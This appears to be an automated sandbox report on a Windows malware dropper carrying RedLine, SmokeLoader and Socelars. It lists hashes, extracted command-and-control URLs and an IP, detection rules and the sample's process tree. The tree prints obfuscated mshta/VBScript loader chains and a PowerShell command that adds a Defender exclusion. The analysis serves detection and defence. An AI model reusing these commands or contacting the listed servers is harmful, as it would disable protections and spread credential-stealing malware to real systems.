redline | 64506751e65ec41605c04620d393cdf9338ce76d31d8b0868dbdfce88f086a03

Target

db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
Size

4.6MB
MD5

c7f1d6db5efddf8b46441be0edfaadfd
SHA1

e27a2fab7ac49b1709c8d9e0183b020f1be61fc6
SHA256

db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12
SHA512

856e4f8a48848b5ddc42af7c282fdbc87df641665c0a0fdb28d5af2b6ac3299d9ae3c9b9d25b145816092abd248df32c9ea4f72ea59217b50460d48fb95ecb9a

Score

10^/10

redline smokeloader socelars media18 aspackv2 backdoor infostealer stealer suricata trojan

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.efxety.top/

Extracted

Family

redline

Botnet

media18

91.121.67.60:2151

Extracted

Family

smokeloader

Version

2020

http://directorycart.com/upload/

http://tierzahnarzt.at/upload/

http://streetofcards.com/upload/

http://ycdfzd.com/upload/

http://successcoachceo.com/upload/

http://uhvu.cn/upload/

http://japanarticle.com/upload/

rc4.i32

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

resource	yara_rule
behavioral15/memory/2508-230-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral15/memory/2508-231-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral15/memory/2508-232-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral15/memory/2508-233-0x000000000041B23E-mapping.dmp	family_redline
behavioral15/memory/2508-235-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral15/memory/2624-244-0x000000000041B23E-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 1 IoCs

resource	yara_rule
behavioral15/files/0x00050000000125c3-125.dat	family_socelars

suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral15/files/0x000600000001224f-71.dat	aspack_v212_v242
behavioral15/files/0x000600000001224f-72.dat	aspack_v212_v242
behavioral15/files/0x0006000000012245-73.dat	aspack_v212_v242
behavioral15/files/0x0006000000012245-74.dat	aspack_v212_v242
behavioral15/files/0x000600000001225f-77.dat	aspack_v212_v242
behavioral15/files/0x000600000001225f-78.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1656	setup_installer.exe
824	setup_install.exe

Loads dropped DLL 18 IoCs

pid	Process
1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
1656	setup_installer.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
824	setup_install.exe
924	cmd.exe
1100	cmd.exe
2000	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
34	ipinfo.io
35	ipinfo.io
49	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2188	824	WerFault.exe	29
2236	1372	WerFault.exe	49
1556	976	WerFault.exe	60
2068	2528	WerFault.exe	68

Kills process with taskkill 3 IoCs

evasion

pid	Process
1448	taskkill.exe
2648	taskkill.exe
2384	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1032 wrote to memory of 1656	1032	db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe	28
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 1656 wrote to memory of 824	1656	setup_installer.exe	29
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 984	824	setup_install.exe	31
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 1332	824	setup_install.exe	32
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 924	824	setup_install.exe	33
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 2028	824	setup_install.exe	34
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1980	824	setup_install.exe	39
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1100	824	setup_install.exe	35
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 1732	824	setup_install.exe	36
PID 824 wrote to memory of 2000	824	setup_install.exe	37

C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe
"C:\Users\Admin\AppData\Local\Temp\db76a117dba6c24a64f328418c742a46b987d3b0914564ea439d468aa422aa12.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        
        PID:1788
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1607c6ec89.exe
      4⤵
      PID:1332
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1607c6ec89.exe
        
        Tue1607c6ec89.exe
        5⤵
        
        PID:1000
      - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1607c6ec89.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1607c6ec89.exe
        6⤵
        
        PID:2516
      - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1607c6ec89.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1607c6ec89.exe
        6⤵
        
        PID:2624
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue160598ce8b05.exe
      4⤵
      Loads dropped DLL
      PID:924
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue160598ce8b05.exe
        
        Tue160598ce8b05.exe
        5⤵
        
        PID:1896
      - C:\Users\Admin\AppData\Roaming\4076254.exe
        
        "C:\Users\Admin\AppData\Roaming\4076254.exe"
        6⤵
        
        PID:1976
      - C:\Users\Admin\AppData\Roaming\1282578.exe
        
        "C:\Users\Admin\AppData\Roaming\1282578.exe"
        6⤵
        
        PID:2212
      - C:\Users\Admin\AppData\Roaming\2418339.exe
        
        "C:\Users\Admin\AppData\Roaming\2418339.exe"
        6⤵
        
        PID:2216
      - C:\Users\Admin\AppData\Roaming\1799390.exe
        
        "C:\Users\Admin\AppData\Roaming\1799390.exe"
        6⤵
        
        PID:2368
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Roaming\1799390.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Roaming\1799390.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        7⤵
        
        PID:1928
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Roaming\1799390.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Roaming\1799390.exe" ) do taskkill -f -Im "%~NXZ"
        8⤵
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
        
        ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
        9⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        10⤵
        
        PID:2976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
        11⤵
        
        PID:2184
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
        10⤵
        
        PID:1180
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
        11⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
        12⤵
        
        PID:784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        12⤵
        
        PID:1940
        
        C:\Windows\SysWOW64\control.exe
        
        control ..\WfNRfms4.K
        12⤵
        
        PID:1988
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        13⤵
        
        PID:3032
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\WfNRfms4.K
        14⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\WfNRfms4.K
        15⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "1799390.exe"
        9⤵
        Kills process with taskkill
        
        PID:2384
      - C:\Users\Admin\AppData\Roaming\4104820.exe
        
        "C:\Users\Admin\AppData\Roaming\4104820.exe"
        6⤵
        
        PID:2912
      - C:\Users\Admin\AppData\Roaming\1909269.exe
        
        "C:\Users\Admin\AppData\Roaming\1909269.exe"
        6⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16497809b6bd.exe
      4⤵
      PID:2028
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16497809b6bd.exe
        
        Tue16497809b6bd.exe
        5⤵
        
        PID:976
      - C:\Users\Admin\Pictures\Adobe Films\6n2BKw0lBRyrEYVeLCSmc59X.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\6n2BKw0lBRyrEYVeLCSmc59X.exe"
        6⤵
        
        PID:2044
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 1520
        6⤵
        Program crash
        
        PID:1556
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1693c6e21a84f1.exe
      4⤵
      Loads dropped DLL
      PID:1100
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1693c6e21a84f1.exe
        
        Tue1693c6e21a84f1.exe
        5⤵
        
        PID:1140
      - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1693c6e21a84f1.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1693c6e21a84f1.exe
        6⤵
        
        PID:2508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16752f37c10e89.exe /mixone
      4⤵
      PID:1732
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16752f37c10e89.exe
        
        Tue16752f37c10e89.exe /mixone
        5⤵
        
        PID:1512
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Tue16752f37c10e89.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16752f37c10e89.exe" & exit
        6⤵
        
        PID:3040
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Tue16752f37c10e89.exe" /f
        7⤵
        Kills process with taskkill
        
        PID:1448
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue16937a015b8e.exe
      4⤵
      Loads dropped DLL
      PID:2000
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16937a015b8e.exe
        
        Tue16937a015b8e.exe
        5⤵
        
        PID:968
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1647cedf7bf133.exe
      4⤵
      PID:1204
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1647cedf7bf133.exe
        
        Tue1647cedf7bf133.exe
        5⤵
        
        PID:316
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue162f02d7b75a1d.exe
      4⤵
      PID:1980
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue162f02d7b75a1d.exe
        
        Tue162f02d7b75a1d.exe
        5⤵
        
        PID:2068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1604aa7d34a61a5b.exe
      4⤵
      PID:1912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue165ec2d1de4f1ae98.exe
      4⤵
      PID:952
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue165ec2d1de4f1ae98.exe
        
        Tue165ec2d1de4f1ae98.exe
        5⤵
        
        PID:2528
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 1408
        6⤵
        Program crash
        
        PID:2068
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue1695d07d02bff8ff.exe
      4⤵
      PID:1724
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue1695d07d02bff8ff.exe
        
        Tue1695d07d02bff8ff.exe
        5⤵
        
        PID:1372
      - C:\Users\Admin\Pictures\Adobe Films\kmc8WlItxQPyzSLZKS3YcTKO.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\kmc8WlItxQPyzSLZKS3YcTKO.exe"
        6⤵
        
        PID:3008
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 1528
        6⤵
        Program crash
        
        PID:2236
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue161bd708d12e5.exe
      4⤵
      PID:1640
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue161bd708d12e5.exe
        
        Tue161bd708d12e5.exe
        5⤵
        
        PID:1064
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue161bd708d12e5.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If """" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue161bd708d12e5.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        6⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue161bd708d12e5.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "" =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue161bd708d12e5.exe" ) do taskkill -F /iM "%~nXE"
        7⤵
        
        PID:2168
        
        C:\Users\Admin\AppData\Local\Temp\fkKCS.exe
        
        fkKCS.EXE -P_3FA3g8_0NB
        8⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBScrIPt: ClOse ( CrEATeobjEct ( "wScRipt.SHELl").run ( "CMd /C tYpe ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe""> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If ""-P_3FA3g8_0NB "" == """" for %E In ( ""C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"" ) do taskkill -F /iM ""%~nXE"" ", 0, True ) )
        9⤵
        
        PID:2896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C tYpe "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe"> fkKCS.exe&& StarT fkKCS.EXE -P_3FA3g8_0NB & If "-P_3FA3g8_0NB " =="" for %E In ( "C:\Users\Admin\AppData\Local\Temp\fkKCS.exe" ) do taskkill -F /iM "%~nXE"
        10⤵
        
        PID:1352
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscRipt: ClOSE( cREaTEOBjEcT ("wSCript.sheLl").RUN ( "Cmd.eXE /c echo N%TIme%O>VPZp.II & EChO | set /p = ""MZ"" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST + ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS " ,0 , TRUe ) )
        9⤵
        
        PID:836
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo N%TIme%O>VPZp.II & EChO | set /p = "MZ" > KL6F.Aa_ &cOpY /y /B kL6F.AA_+LAQIL0YY.POg + vCTGFFAM.2ST+ ip~Q0M_L.i + IfY08H17.9LD + 1cQMG.2 + VpZp.II PUA9.FS & sTaRT msiexec.exe /Y .\pUA9.FS
        10⤵
        
        PID:3068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>KL6F.Aa_"
        11⤵
        
        PID:1480
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EChO "
        11⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe /Y .\pUA9.FS
        11⤵
        
        PID:472
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F /iM "Tue161bd708d12e5.exe"
        8⤵
        Kills process with taskkill
        
        PID:2648
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue166a21bf15ecf0.exe
      4⤵
      PID:1088
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue166a21bf15ecf0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue166a21bf15ecf0.exe"
        5⤵
        
        PID:2168
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue166a21bf15ecf0.exe
        
        Tue166a21bf15ecf0.exe
        5⤵
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue169b8ca3fff9b96f8.exe
      4⤵
      PID:1952
    - - C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue169b8ca3fff9b96f8.exe
        
        Tue169b8ca3fff9b96f8.exe
        5⤵
        
        PID:864
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 476
      4⤵
      Program crash
      PID:2188

C:\Users\Admin\AppData\Local\Temp\is-BLVMQ.tmp\Tue16937a015b8e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BLVMQ.tmp\Tue16937a015b8e.tmp" /SL5="$1015E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16937a015b8e.exe"
1⤵
PID:2228
- C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16937a015b8e.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16937a015b8e.exe" /SILENT
  2⤵
  PID:2328
- - C:\Users\Admin\AppData\Local\Temp\is-HF91E.tmp\Tue16937a015b8e.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-HF91E.tmp\Tue16937a015b8e.tmp" /SL5="$2015E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS87629A16\Tue16937a015b8e.exe" /SILENT
    3⤵
    PID:2428

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-247-0x000000001B150000-0x000000001B152000-memory.dmp

Filesize
8KB

Download
memory/316-222-0x0000000001020000-0x0000000001021000-memory.dmp

Filesize
4KB

Download
memory/824-90-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/824-95-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/824-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/824-91-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/824-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/824-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/824-92-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/824-93-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/824-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/824-97-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/824-96-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/824-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/824-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/824-94-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/824-98-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/968-197-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/976-254-0x0000000004170000-0x00000000042BC000-memory.dmp

Filesize
1.3MB

Download
memory/1000-216-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/1000-208-0x0000000000AD0000-0x0000000000AD1000-memory.dmp

Filesize
4KB

Download
memory/1032-55-0x0000000075731000-0x0000000075733000-memory.dmp

Filesize
8KB

Download
memory/1088-200-0x0000000000B10000-0x0000000000C05000-memory.dmp

Filesize
980KB

Download
memory/1140-207-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/1140-217-0x0000000000860000-0x0000000000861000-memory.dmp

Filesize
4KB

Download
memory/1272-251-0x0000000002CC0000-0x0000000002CD6000-memory.dmp

Filesize
88KB

Download
memory/1372-252-0x00000000041B0000-0x00000000042FC000-memory.dmp

Filesize
1.3MB

Download
memory/1512-225-0x00000000002C0000-0x0000000000309000-memory.dmp

Filesize
292KB

Download
memory/1512-190-0x0000000002FF0000-0x0000000003019000-memory.dmp

Filesize
164KB

Download
memory/1512-227-0x0000000000400000-0x0000000002F29000-memory.dmp

Filesize
43.2MB

Download
memory/1556-299-0x0000000000420000-0x0000000000421000-memory.dmp

Filesize
4KB

Download
memory/1896-209-0x00000000002D0000-0x00000000002D1000-memory.dmp

Filesize
4KB

Download
memory/1896-237-0x0000000004960000-0x0000000004961000-memory.dmp

Filesize
4KB

Download
memory/1896-221-0x00000000002A0000-0x00000000002A1000-memory.dmp

Filesize
4KB

Download
memory/2068-193-0x00000000002A0000-0x00000000002A9000-memory.dmp

Filesize
36KB

Download
memory/2068-224-0x0000000000250000-0x0000000000259000-memory.dmp

Filesize
36KB

Download
